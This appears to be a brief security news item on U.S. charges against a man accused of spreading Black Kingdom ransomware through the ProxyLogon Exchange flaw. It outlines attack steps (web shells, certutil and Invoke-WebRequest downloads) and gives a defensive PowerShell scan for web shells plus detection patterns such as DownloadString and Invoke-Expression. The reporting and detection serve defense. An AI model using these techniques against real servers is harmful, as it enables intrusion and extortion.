Read Time:1 Minute, 16 Second
The U.S. Department of Justice unsealed charges against Yemeni national Rami Khaled Ahmed (36) for deploying Black Kingdom ransomware via ProxyLogon exploits (CVE-2021-26855) against 1,500+ systems, including U.S. healthcare, education, and hospitality sectors. The attacks, occurring between March 2021 and June 2023, leveraged post-exploitation PowerShell commands to deploy web shells and download ransomware payloads.
Technical analysis
- Initial Access: Exploited unpatched Exchange servers to drop web shells (e.g.,
.aspxfiles). - Payload Delivery: Used commands like
Invoke-WebRequestorcertutilto fetch ransomware binaries from attacker-controlled domains. - Ransom Mechanism: encrypted files or exfiltrated data, demanding $10,000 in Bitcoin with payment confirmation sent to
blackkingdom@[redacted].com. Black Kingdom’s code lacked sophistication, relying on hardcoded paths and minimal obfuscation.
Operational context
- Linked to Pulse Secure VPN exploits (CVE-2019-11510) before shifting to ProxyLogon.
- FBI and New Zealand Police traced Bitcoin transactions to Ahmed’s wallets, revealing ties to co-conspirators.
Broader trends
- Declining Ransom Payments: 64% of 2024 victims refused payments, per Verizon. Median payments dropped to $115,000.
- Law Enforcement impact: recent takedowns (e.g., LockBit, ALPHV/BlackCat) fragmented ransomware ecosystems, pushing affiliates toward independent operations
Mitigation Steps
powershell# Check for ProxyLogon-related web shells
Get-ChildItem -Path "C:\inetpub\wwwroot\aspnet_client\" -Filter *.aspx -Recurse | Select-String -Pattern "eval(Request" Patch Exchange servers immediately and audit PowerShell execution logs for anomalous DownloadString or Invoke-Expression patterns.
Ahmed faces up to 15 years if convicted, highlighting intensified global efforts to disrupt ransomware economies.